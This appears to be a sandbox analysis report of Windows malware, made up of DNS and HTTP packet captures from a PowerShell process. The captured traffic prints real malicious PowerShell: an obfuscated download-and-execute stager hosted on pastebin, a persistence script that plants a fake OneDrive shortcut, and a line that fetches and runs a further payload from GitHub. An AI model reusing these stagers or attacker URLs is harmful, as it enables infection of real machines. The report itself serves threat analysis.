                                            Oct 15, 2024 16:14:14.994728088 CEST1.1.1.1192.168.2.60xb503No error (0)tinyurl.com104.17.112.233A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:14.994728088 CEST1.1.1.1192.168.2.60xb503No error (0)tinyurl.com104.18.111.161A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:15.720431089 CEST1.1.1.1192.168.2.60x289fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:15.720431089 CEST1.1.1.1192.168.2.60x289fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:15.720431089 CEST1.1.1.1192.168.2.60x289fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:15.720431089 CEST1.1.1.1192.168.2.60x289fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:31.967370987 CEST1.1.1.1192.168.2.60x2651No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:31.967370987 CEST1.1.1.1192.168.2.60x2651No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:31.967370987 CEST1.1.1.1192.168.2.60x2651No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:35.634560108 CEST1.1.1.1192.168.2.60xa015No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:35.634560108 CEST1.1.1.1192.168.2.60xa015No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:35.634560108 CEST1.1.1.1192.168.2.60xa015No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:35.634560108 CEST1.1.1.1192.168.2.60xa015No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:14:35.634560108 CEST1.1.1.1192.168.2.60xa015No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • raw.githubusercontent.com
                                            • pastebin.com
                                            • discord.com
                                            • tinyurl.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.649761104.17.112.233803576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:14:15.016047955 CEST164OUTGET /bdhpvpny HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: tinyurl.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:14:15.701669931 CEST1236INHTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:14:15 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt
                                            Referrer-Policy: unsafe-url
                                            X-Robots-Tag: noindex
                                            X-TinyURL-Redirect-Type: redirect
                                            Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                            X-TinyURL-Redirect: eyJpdiI6IjZyYmpuSE9zNTFHTHlIS3BHZkgwVWc9PSIsInZhbHVlIjoiZEtOWVVJdC9HZnBsR25DZGswcU93bDV3NHh0bFVzVkhYakJVZ245eEtIelRUOURZc1hRcjRLNVBoNTFMdDlmVnMzcFNlOXd1V2JSRzZtbDlMTlQ0Tmc9PSIsIm1hYyI6IjU4MDVkMjY3NTNlMTA5NzUxZTQ5MmE4ZGYxNDE1MDRhMTk4Y2M1NWFlNWExYjYwZWFlN2NkNWE4ZWQzYzU0MGEiLCJ0YWciOiIifQ==
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            CF-Cache-Status: HIT
                                            Age: 365
                                            Set-Cookie: __cf_bm=dQIzkXlQvrno7G_x9XLN9PhdkHbnCmvBNPyNvLbkijQ-1729001655-1.0.1.1-WFarWgZS.ljrjIWfzu6Kfd1Jriyuivg.iFhnK2gvNM.MMVLaDSXA8sLWPNpvB8zMXbLNWPRF58pc.w1v9mRItw; path=/; expires=Tue, 15-Oct-24 14:44:15 GMT; domain=.tinyurl.com; HttpOnly
                                            Server: cloudflare
                                            CF-RAY: 8d306a1b9f754672-DFW
                                            alt-svc: h3=":443"; ma=86400
                                            Data Raw: 32 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a
                                            Data Ascii: 272<!DOCTYPE html><html> <head> <meta charset="UTF-8" />
                                            Oct 15, 2024 16:14:15.701783895 CEST566INData Raw: 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63
                                            Data Ascii: <meta http-equiv="refresh" content="0;url='https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt'" /> <title>Redirecting to https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyr


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.649833104.20.3.235806272C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:14:31.980628014 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:14:32.651866913 CEST472INHTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:14:32 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: keep-alive
                                            Cache-Control: max-age=3600
                                            Expires: Tue, 15 Oct 2024 15:14:32 GMT
                                            Location: https://pastebin.com/raw/sA04Mwk2
                                            Server: cloudflare
                                            CF-RAY: 8d306a858ef5e5ad-DFW
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.649837185.199.108.133806272C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:14:33.561064959 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:14:34.198551893 CEST541INHTTP/1.1 301 Moved Permanently
                                            Connection: close
                                            Content-Length: 0
                                            Server: Varnish
                                            Retry-After: 0
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:14:34 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdal2120030-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001674.138075,VS0,VE0
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            Expires: Tue, 15 Oct 2024 14:19:34 GMT
                                            Vary: Authorization,Accept-Encoding


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.649847104.20.3.235806976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:14:39.618814945 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:14:40.262598038 CEST472INHTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:14:40 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: keep-alive
                                            Cache-Control: max-age=3600
                                            Expires: Tue, 15 Oct 2024 15:14:40 GMT
                                            Location: https://pastebin.com/raw/sA04Mwk2
                                            Server: cloudflare
                                            CF-RAY: 8d306ab5280e45f3-DFW
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.649851185.199.108.133806976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:14:41.140902996 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:14:42.192260027 CEST541INHTTP/1.1 301 Moved Permanently
                                            Connection: close
                                            Content-Length: 0
                                            Server: Varnish
                                            Retry-After: 0
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:14:42 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdfw8210099-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001682.121156,VS0,VE0
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            Expires: Tue, 15 Oct 2024 14:19:42 GMT
                                            Vary: Authorization,Accept-Encoding


                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.649765185.199.108.1334433576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:14:16 UTC231OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:14:16 UTC899INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7088
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "6e4c41fcadb09e4c44f95bcd21966ae888aebf2d5f8b0bcd34ef015521114ea0"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: AC22:294C14:83F2F0:907E59:670E774B
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:14:16 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdal2120092-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001657.541853,VS0,VE76
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 17c4249915aa293b9b5f9e6633a452326d8165ff
                                            Expires: Tue, 15 Oct 2024 14:19:16 GMT
                                            Source-Age: 0
                                            2024-10-15 14:14:16 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                            Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                            2024-10-15 14:14:16 UTC1378INData Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                            Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
                                            2024-10-15 14:14:16 UTC1378INData Raw: 34 37 2c 30 2c 39 39 2c 30 2c 33 32 2c 30 2c 33 34 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 39 39 2c 30 2c 31 31 31 2c 30 2c 31 30 39 2c 30 2c 31 30 39 2c 30 2c 39 37 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 33 32 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 31 31 39 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31
                                            Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
                                            2024-10-15 14:14:16 UTC1378INData Raw: 31 30 2c 32 33 39 2c 31 37 2c 31 35 30 2c 31 39 34 2c 32 31 32 2c 32 31 36 2c 38 33 2c 31 33 33 2c 32 34 2c 31 37 2c 37 33 2c 32 2c 30 2c 30 2c 39 2c 30 2c 30 2c 31 36 30 2c 38 39 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 32 33 37 2c 34 38 2c 31 38 39 2c 32 31 38 2c 36 37 2c 30 2c 31 33 37 2c 37 31 2c 31 36 37 2c 32 34 38 2c 32 30 38 2c 31 39 2c 31 36 34 2c 31 31 35 2c 31 30 32 2c 33 34 2c 36 31 2c 30 2c 30 2c 30 2c 31 30 30 2c 30 2c 30 2c 30 2c 30 2c 33 31 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 30 2c 30 2c 38 33 2c 30 2c 31 32 31 2c 30 2c 31 31 35 2c 30 2c 31 31 36 2c 30 2c 31 30 31 2c 30 2c 31 30 39 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 33 32 2c 30 2c 34 30 2c 30 2c 36 37 2c 30 2c 35 38 2c 30 2c 39 32 2c 30 2c 38 37 2c 30 2c 31 30 35 2c 30
                                            Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
                                            2024-10-15 14:14:16 UTC1378INData Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                            Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
                                            2024-10-15 14:14:16 UTC198INData Raw: 74 70 75 74 20 22 46 61 69 6c 65 64 20 74 6f 20 73 65 6e 64 20 6d 65 73 73 61 67 65 2e 20 45 72 72 6f 72 3a 20 24 5f 22 0a 7d 0a 23 73 74 61 72 74 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 20 2d 61 72 67 73 20 27 69 65 78 20 28 69 77 72 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 5f 70 79 6c 64 2e 74 78 74 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 27 0a 0a 7d 0a
                                            Data Ascii: tput "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.649834104.20.3.2354436272C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:14:33 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:14:33 UTC398INHTTP/1.1 200 OK
                                            Date: Tue, 15 Oct 2024 14:14:33 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: HIT
                                            Age: 1323
                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                            Server: cloudflare
                                            CF-RAY: 8d306a8afb004781-DFW
                                            2024-10-15 14:14:33 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                            2024-10-15 14:14:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.649838185.199.108.1334436272C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:14:34 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:14:35 UTC902INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7508
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:14:35 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdal2120056-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001675.953197,VS0,VE106
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 3ea8290d286372b86ecd7c8042264cc2e1b55a86
                                            Expires: Tue, 15 Oct 2024 14:19:35 GMT
                                            Source-Age: 0
                                            2024-10-15 14:14:35 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                            2024-10-15 14:14:35 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
